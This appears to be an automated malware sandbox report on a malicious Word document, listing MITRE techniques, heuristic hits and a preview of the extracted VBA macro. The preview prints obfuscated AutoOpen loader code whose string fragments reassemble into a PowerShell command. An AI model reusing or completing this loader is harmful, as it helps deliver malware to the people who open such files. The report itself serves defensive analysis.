Verdict: MALICIOUS
Risk Score: 182

Malware Insights

MITRE ATT&CK: T1059.005 (Visual Basic), T1204.002 (Malicious File)
The sample is a Microsoft Office document containing a VBA macro with an AutoOpen function, indicating it is designed to execute automatically upon opening. The macro utilizes the Shell() function, a common technique for launching external processes, likely to download and execute a secondary payload. The presence of a 'Password-protected archive handoff' heuristic suggests the document may be part of a multi-stage attack where the user is prompted to open a password-protected file.
Heuristics (6)

- VBA macros detected (medium, 2 related findings) `OLE_VBA_MACROS`: Document contains VBA macro code.
- Shell() call in VBA (critical) `OLE_VBA_SHELL`: Shell() call in VBA.
- AutoOpen macro (high) `OLE_VBA_AUTOOPEN`: AutoOpen macro.
- Password-protected archive handoff (high) `SE_PASSWORD_ARCHIVE_LURE`: Document gives password instructions for an archive or attachment, often used to keep payloads encrypted until after gateway scanning.
- Legacy WordBasic auto-exec macro marker (medium) `OLE_LEGACY_WORDBASIC_AUTOEXEC`: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) `EMBEDDED_URL`: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 172134 bytes |

SHA-256: 8215ed6e896cfc5e7129b6ed840a0891cded109a7754d8630a6cd891ebd25ae6
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "UiMbLOlO"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function ijnsUVlG()
On Error Resume Next
ictzhOrABVB = (pAwbnf - CDbl(160398) + HTYGAiFBbH + Fix(jWnKX / CLng(332995 * Sqr(zoaCvV))) - 748524 / Sin(EjCihGEwIJ - bFWsOcNQtv - 417431 + CLng(iZidkbzEmL)) * 850629 * Fix(160398))
wWfEAkhTvth = "b40hdMurdIjlKsHQ8kfhVl . ( $pshOMfM9w7chowershelpQcIDuOZiPkbjt"
nSfBMmQ = Left(Right(wWfEAkhTvth, 22), 8) + Left(Right(wWfEAkhTvth, 42), 13)
nRtOWHmjka = "FbrtME[U4]K9"
IRopWDTG = Left(Right(nRtOWHmjka, 7), 2) + CStr(Left(Right(nRtOWHmjka, 4), 2))
uaGHbAqaLvo = Chr(43)
OPunJwcL = "rtMj3UrAK9Qm1C$pSHu]m1ome[30NwPjm"
hdYmmI = CStr(Left(Right(OPunJwcL, 19), 4)) + CStr(Left(Right(OPunJwcL, 11), 6)) + CStr(Left(Right(OPunJwcL, 14), 1))
wnKSEuM = Chr(43)
ciTIwGjkwi = "wXX:mxNVkIIu'X') (h7XVyvtp8txMxwpKc2haVUBoe (' . ( CcmWRYcmwoIU"
zjtNjCuSlOJ = Left(Right(ciTIwGjkwi, 51), 6) + Left(Right(ciTIwGjkwi, 20), 11) + Left(Right(ciTIwGjkwi, 21), 1) + Left(Right(ciTIwGjkwi, 57), 1) + CStr(Left(Right(ciTIwGjkwi, 56), 1)) + Left(Right(ciTIwGjkwi, 60), 1)
FhkorVj = "6'CcO3wXXfmxMSPIIu"
RoaAqb = Left(Right(FhkorVj, 15), 2) + CStr(Left(Right(FhkorVj, 6), 3)) + CStr(Left(Right(FhkorVj, 17), 1))
anQCkuz = Chr(43)
vUdlVm = "wXXmmNBikII'Ec[4,ph7XVyvtp8txMxwpKc2hai24,25]-joDLHNQxWRY"
GjICMO = CStr(Left(Right(vUdlVm, 46), 6)) + CStr(Left(Right(vUdlVm, 18), 9)) + CStr(Left(Right(vUdlVm, 19), 1)) + CStr(Left(Right(vUdlVm, 52), 1)) + Left(Right(vUdlVm, 50), 1) + Left(Right(vUdlVm, 54), 1)
mMhdJTht = (icMwwQvfiI - CDbl(346320) + PncdiHz + Fix(wtYjZncoLRI / CLng(658238 * Sqr(aLzcJLf))) - 152103 / Sin(lOhcT - JzjDwC - 98878 + CLng(jvtJwnJ)) * 756312 * Fix(346320))
uEDSwoKvOK = "wXX'msBakIInimn) ph7XVyvtp8txMxwpKc2haVUn( ((imn1MmNQxWRYcmw"
hkJcduPZQ = CStr(Left(Right(uEDSwoKvOK, 49), 6)) + Left(Right(uEDSwoKvOK, 19), 10) + Left(Right(uEDSwoKvOK, 20), 1) + Left(Right(uEDSwoKvOK, 55), 1) + Left(Right(uEDSwoKvOK, 53), 1) + Left(Right(uEDSwoKvOK, 57), 1)
YLKmJ = Chr(43)
zccoz = "8i'i5C853mnX"
UuEMLzwlmf = CStr(Left(Right(zccoz, 10), 2)) + CStr(Left(Right(zccoz, 3), 2))
jRmzNvwjf = Chr(43)
lXqzOjIdC = (POGdSv - CDbl(783804) + QJbvvWiszmj + Fix(qKVcw / CLng(71958 * Sqr(ziDaXbaAEsY))) - 681527 / Sin(TSkPnRrm - ALEQubXMzt - 84684 + CLng(HjVMqplAUu)) * 66331 * Fix(783804))
DVGGiD = "53wXFcmximndau4lrlnph7XVyvtp8tUsd = &(haVUBoY"
tPWGBBrSr = Left(Right(DVGGiD, 37), 5) + Left(Right(DVGGiD, 14), 7) + Left(Right(DVGGiD, 15), 1) + Left(Right(DVGGiD, 41), 1) + CStr(Left(Right(DVGGiD, 40), 1))
OpWbTAzDi = "8inU5C853FcX"
JUIrwT = CStr(Left(Right(OpWbTAzDi, 10), 2)) + CStr(Left(Right(OpWbTAzDi, 3), 2))
scUfNrBB = Chr(43)
JsZtdLAMLTs = "53mnXUFcBSkIIu4lrlnpeUFcivtp8t"
dmllHHR = CStr(Left(Right(JsZtdLAMLTs, 25), 3)) + Left(Right(JsZtdLAMLTs, 10), 5) + CStr(Left(Right(JsZtdLAMLTs, 28), 1)) + CStr(Left(Right(JsZtdLAMLTs, 27), 1))
CoMwOG = Chr(43)
LacQnzZOQI = "8i56'C"
FUfVwz = Left(Right(LacQnzZOQI, 5), 1) + Left(Right(LacQnzZOQI, 2), 1)
tpJGb = (VIZsLjFTI - CDbl(238497) + CYVmIPV + Fix(rsiiGYO / CLng(723970 * Sqr(SsDfGckH))) - 393107 / Sin(zYnMowQQjij - QuiUtPjAm - 166733 + CLng(BijNM)) * 979373 * Fix(238497))
iKcmhvBPoN = Chr(43)
rjNCA = "u'mn65C85"
BIjziKWmS = Left(Right(rjNCA, 8), 1) + CStr(Left(Right(rjNCA, 7), 2))
ISbuDnA = Chr(43)
FwAUicdviqU = "'Lu"
ScVHf = Left(Right(FwAUicdviqU, 3), 1)
icbUiSvaVz = Chr(43)
AiPsXiP = "5C8n3wX'UFcBSkIIu4lrlnphmw-obji8txMx"
jtTZJPPl = CStr(Left(Right(AiPsXiP, 29), 4)) + CStr(Left(Right(AiPsXiP, 11), 6)) + Left(Right(AiPsXiP, 12), 1) + CStr(Left(Right(AiPsXiP, 33), 1))
ijnsUVlG = nSfBMmQ + IRopWDTG + uaGHbAqaLvo + hdYmmI + wnKSEuM + zjtNjCuSlOJ + RoaAqb + anQCkuz + GjICMO + hkJcduPZQ + YLKmJ + UuEMLzwlmf + jRmzNvwjf + tPWGBBrSr + JUIrwT + scUfNrBB + dmllHHR + CoMwOG + FUfVwz + iKcmhvBPoN + BIjziKWmS + ISbuDnA + ScVHf + icbUiSvaVz + jtTZJPPl
End Func
... (truncated)
```